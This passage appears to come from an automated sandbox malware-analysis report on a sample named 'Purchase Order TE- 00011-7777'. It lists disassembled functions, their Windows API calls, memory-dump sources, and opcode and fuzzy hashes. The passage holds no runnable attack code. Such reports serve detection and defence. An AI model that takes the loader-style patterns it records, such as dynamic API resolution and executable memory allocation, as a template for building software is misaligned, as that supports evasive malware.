                      • Instruction ID: 22cb7ef7a75684f7d4ca86d3036741c910300010f078820616027ae9ba73bf49
                      • Opcode Fuzzy Hash: 8abb06159dfa0a7f2a96e5ce5281da3e18a9b5d6c2d102e7991a2a1525d1c204
                      • Instruction Fuzzy Hash: 2E21A73161021CBFEF119F94CC85FBB3BAAEF8A794F018124FA055B190CA719C5187E0
                      Function 00AFA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AFA27B
                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AFA290
                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AFA29D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: msctls_trackbar32
                      • API String ID: 3850602802-1010561917
                      • Opcode ID: 6ef2dc3bf1e6ba8d15d3d5f5e16f764dacaf0be945f3b4bf10532457bfac30fa
                      • Instruction ID: 30bb8ad92d9f038a0e6b613a05622f9b6baf4b1eb5025f6db86e39cae6a600b4
                      • Opcode Fuzzy Hash: 6ef2dc3bf1e6ba8d15d3d5f5e16f764dacaf0be945f3b4bf10532457bfac30fa
                      • Instruction Fuzzy Hash: 2611E771240308BAEB205FA5CC46FE73BA8EF99B54F114118FB45970A0D6729851DB60
                      Function 00AB2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AB3028,?), ref: 00AB2F79
                      • GetProcAddress.KERNEL32(00000000), ref: 00AB2F80
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RoInitialize$combase.dll
                      • API String ID: 2574300362-340411864
                      • Opcode ID: 877b2c39e35faf0200fad7a64b7f5755e6c1f75d9b0c89cde034fbff347f9b86
                      • Instruction ID: 059dc18c693675b769ba6ff337a84623e1effef0b9e3187e8ef2cfb695228cf1
                      • Opcode Fuzzy Hash: 877b2c39e35faf0200fad7a64b7f5755e6c1f75d9b0c89cde034fbff347f9b86
                      • Instruction Fuzzy Hash: E1E01A746E4702AAEB106F70EC49BD53AA8BB01746F5040A4B202F71B0CFB54050DF05
                      Function 00AB3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AB2F4E), ref: 00AB304E
                      • GetProcAddress.KERNEL32(00000000), ref: 00AB3055
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RoUninitialize$combase.dll
                      • API String ID: 2574300362-2819208100
                      • Opcode ID: c6d6d1f95668f8daa072e552bfd467ceb07458cea07000f190d2f562e25dd2a4
                      • Instruction ID: 0cd3248596322eacec370be04b585ced21d1f0d770cb4a26f6b6310533e7fc42
                      • Opcode Fuzzy Hash: c6d6d1f95668f8daa072e552bfd467ceb07458cea07000f190d2f562e25dd2a4
                      • Instruction Fuzzy Hash: 6CE0B6746A8700ABEB20BF71ED0DB953AA8BB00703F500098F609F31B1DFB845408B16
                      Function 00B0BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LocalTime__swprintf
                      • String ID: %.3d$WIN_XPe
                      • API String ID: 2070861257-2409531811
                      • Opcode ID: dc9c8402c99038c2bc742d0f966992897fef63e656a7c74a3681ceea044deca3
                      • Instruction ID: 1d831871766cc5807bab00bf3217e72491ee7599ebbde197908d9b1d43305439
                      • Opcode Fuzzy Hash: dc9c8402c99038c2bc742d0f966992897fef63e656a7c74a3681ceea044deca3
                      • Instruction Fuzzy Hash: B4E01271D0801CFACB14C6908D86EFA77FCAB08300F5084D3B91692095DB359B54AB21
                      Function 00AAE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE69C,75920AE0,00AAE5AC,00B2DC28,?,?), ref: 00AAE6B4
                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AAE6C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetNativeSystemInfo$kernel32.dll
                      • API String ID: 2574300362-192647395
                      • Opcode ID: e302f65b495798f5b3ae1b6ac37af5aeead3143ee139ffc8b98d252c2e10877e
                      • Instruction ID: 4b26311fe15767715f5a078f2f62067d53928b817966ac081df591369fbb5726
                      • Opcode Fuzzy Hash: e302f65b495798f5b3ae1b6ac37af5aeead3143ee139ffc8b98d252c2e10877e
                      • Instruction Fuzzy Hash: 48D0A7744803129FD7219F31E80874237E4AFA8305B409859F485E31B4DB70C4809610
                      Function 00AAE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE6D9,?,00AAE55B,00B2DC28,?,?), ref: 00AAE6F1
                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00AAE703
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: IsWow64Process$kernel32.dll
                      • API String ID: 2574300362-3024904723
                      • Opcode ID: bd1e4a9747104594c8f6f7b5d2ca3f46f4a71e01decd7e82903dc2b65994afc9
                      • Instruction ID: 8a88891aedf7b20ed79b628c40a6a8c7cf8aad2e0666ee4b8691d2a7e0ab8105
                      • Opcode Fuzzy Hash: bd1e4a9747104594c8f6f7b5d2ca3f46f4a71e01decd7e82903dc2b65994afc9
                      • Instruction Fuzzy Hash: 21D0A974480322AFDB24AF22E84C7833BE8BF05300B40846AF495E32A0DBB0C8809A10
                      Function 00AEEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AEEBAF,?,00AEEAAC), ref: 00AEEBC7
                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AEEBD9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                      • API String ID: 2574300362-1816364905
                      • Opcode ID: 337e55e46259a5a0ffabe32f9c531069c0685e3b669512a2fdfdf7d2dd734a1c
                      • Instruction ID: 7bca46abd75a4807caf6d2a793440f72cfc06a56d79b34cbed93887cd56d0803
                      • Opcode Fuzzy Hash: 337e55e46259a5a0ffabe32f9c531069c0685e3b669512a2fdfdf7d2dd734a1c
                      • Instruction Fuzzy Hash: 1AD0A974444322AFD7209F32E849B8237E8AF04304BA0C46AF896E2370DFB0D8808A10
                      Function 00AD13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00AD1371,?,00AD1519), ref: 00AD13B4
                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00AD13C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                      • API String ID: 2574300362-1587604923
                      • Opcode ID: a8b585cb4dd01a5574feeac863a956c9e6905c79cc48998850a4d7d5e6995deb
                      • Instruction ID: 9c81a4f32d2f26a46b6fa40d365a30605e5d440f87de3d6036e7b510b3c4f7fc
                      • Opcode Fuzzy Hash: a8b585cb4dd01a5574feeac863a956c9e6905c79cc48998850a4d7d5e6995deb
                      • Instruction Fuzzy Hash: C3D0A930800322BFD7254F24E80878237E9AB40704F40846AE496E2778DEB0C880AB10
                      Function 00AD137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,00AD135F,?,00AD1440), ref: 00AD1389
                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00AD139B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                      • API String ID: 2574300362-1071820185
                      • Opcode ID: c659f067667e00944c5c0614235454ff3d78f5f5ffe1e3ab37a5aa58cbe81413
                      • Instruction ID: 04ebe441c479b87d4572fc123cf3ef61965009cfeab51ce0cd030cc34b11884e
                      • Opcode Fuzzy Hash: c659f067667e00944c5c0614235454ff3d78f5f5ffe1e3ab37a5aa58cbe81413
                      • Instruction Fuzzy Hash: C8D0A730800322BFD7300F24E80878137D4AF04704F08845AE486E2760DA70CA809710
                      Function 00AF3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00AF3AC2,?,00AF3CF7), ref: 00AF3ADA
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AF3AEC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2574300362-4033151799
                      • Opcode ID: bee2754c11f49b8d0100ce4f3987edadb93fb4ad664df3c1baa0e36f0443599f
                      • Instruction ID: aeaa31b79e7753ded9f02b073be5af47c610360657d3d14fc2ad24a570518a2c
                      • Opcode Fuzzy Hash: bee2754c11f49b8d0100ce4f3987edadb93fb4ad664df3c1baa0e36f0443599f
                      • Instruction Fuzzy Hash: 59D0A931441323AFDB20AFB2E80E79637E8AB11304B0084A9F9D5E2260EFF0C9908A10
                      Function 00ACA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bb22fb066b19f3464fa3ce1adce48e39fe6c3a236fa3e26f3c78497a3bc8d37
                      • Instruction ID: f3fa42ce0f739344cd6c00ea0a8a83912b2206d6cc52873a73a6019ba41613c1
                      • Opcode Fuzzy Hash: 5bb22fb066b19f3464fa3ce1adce48e39fe6c3a236fa3e26f3c78497a3bc8d37
                      • Instruction Fuzzy Hash: 17C14975A0021AEBCB14CFA4C984FBEB7B5FF58708F118599E912AB251D730DE41CBA1
                      Function 00A9AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00AE6AA6), ref: 00A9AB2D
                      • _wcscmp.LIBCMT ref: 00A9AB49
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper_wcscmp
                      • String ID:
                      • API String ID: 820872866-0
                      • Opcode ID: 901ddabcbdaeb9e7bc617a052abe6e33e8138b652836286d197576631686b6f1
                      • Instruction ID: a487ea214d0bb0ccef3b684f1b4cbca6fbe32a5ab9fe838f5116b48215eec9b1
                      • Opcode Fuzzy Hash: 901ddabcbdaeb9e7bc617a052abe6e33e8138b652836286d197576631686b6f1
                      • Instruction Fuzzy Hash: DBA1F27570010A9BDF14DF65EA816AEBBF1FF58300F6485AAEC5687290EB309C70D782
                      Function 00AF0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                      Download Yara Rule
                      APIs
                      • CharLowerBuffW.USER32(?,?), ref: 00AF0D85
                      • CharLowerBuffW.USER32(?,?), ref: 00AF0DC8
                        • Part of subcall function 00AF0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00AF0478
                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AF0FB2
                      • _memmove.LIBCMT ref: 00AF0FC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharLower$AllocVirtual_memmove
                      • String ID:
                      • API String ID: 3659485706-0
                      • Opcode ID: dc715b29a22e04274e471dab1e86546a5f1515624566860b09d0f33cedddb400
                      • Instruction ID: 232d69335450256a60055e67dd948332124639f6399325b29723ca76df1a327c
                      • Opcode Fuzzy Hash: dc715b29a22e04274e471dab1e86546a5f1515624566860b09d0f33cedddb400
                      • Instruction Fuzzy Hash: 72B19B716043048FCB14DF68C98096ABBE4EF89754F14886EF98ADB352DB31ED46CB91
                      Function 00AEAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00AEAF56
                      • CoUninitialize.OLE32 ref: 00AEAF61
                        • Part of subcall function 00AD1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AD10B8
                      • VariantInit.OLEAUT32(?), ref: 00AEAF6C
                      • VariantClear.OLEAUT32(?), ref: 00AEB23F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                      • String ID:
                      • API String ID: 780911581-0
                      • Opcode ID: d2752579360190bf1b359f741a265bf33abfa310ea9a912d4ea7d3c0afce5fe1
                      • Instruction ID: 24970170b7df5165ba4a19ea64036902233bef72e852da57606d73483d30004b
                      • Opcode Fuzzy Hash: d2752579360190bf1b359f741a265bf33abfa310ea9a912d4ea7d3c0afce5fe1
                      • Instruction Fuzzy Hash: 5AA189356047429FCB10DF19C995B5AB7E4BF89320F048559FA9AAB3A1CB30FD40CB92
                      Function 00A9C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                      Download Yara Rule
                      APIs
                      • _memmove.LIBCMT ref: 00A9C419
                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00AD6653,?,?,00000000), ref: 00A9C495
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FileRead_memmove
                      • String ID:
                      • API String ID: 1325644223-0
                      • Opcode ID: 59ba8c210ba1062b7553b0d4d40197b5339db5e85158dbae26ecc578bab2769e
                      • Instruction ID: a9faf03b9e05a20d2ced600df4d91df6c0c172f7ec9856dfb0c62b98a61649d5
                      • Opcode Fuzzy Hash: 59ba8c210ba1062b7553b0d4d40197b5339db5e85158dbae26ecc578bab2769e
                      • Instruction Fuzzy Hash: FDA1AA70A04A19EBDF00CF69C984BAAFBF0FF05310F14C695E8659B291D731E960DB91
                      Function 00AB42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                      • String ID:
                      • API String ID: 3877424927-0
                      • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                      • Instruction ID: f936437cd0925dba6c0f98e6ef1353e13b117e172422a7b9ef749a1ccfb2ed6b
                      • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                      • Instruction Fuzzy Hash: 0C519430A003059FDF248FA989806EE77FDAF48360F288729F8759A2D3D7709D619B40
                      Function 00AFC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(0138A458,?), ref: 00AFC354
                      • ScreenToClient.USER32(?,00000002), ref: 00AFC384
                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00AFC3EA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ClientMoveRectScreen
                      • String ID:
                      • API String ID: 3880355969-0
                      • Opcode ID: e4edc803501fef75fa045dd7e6eb95a343cac85b9ea957d863790061443a8e95
                      • Instruction ID: 9d69c32abb9f5d3478cde2fc65e1c28e8653b7c93024d775e6b9ed50928d301e
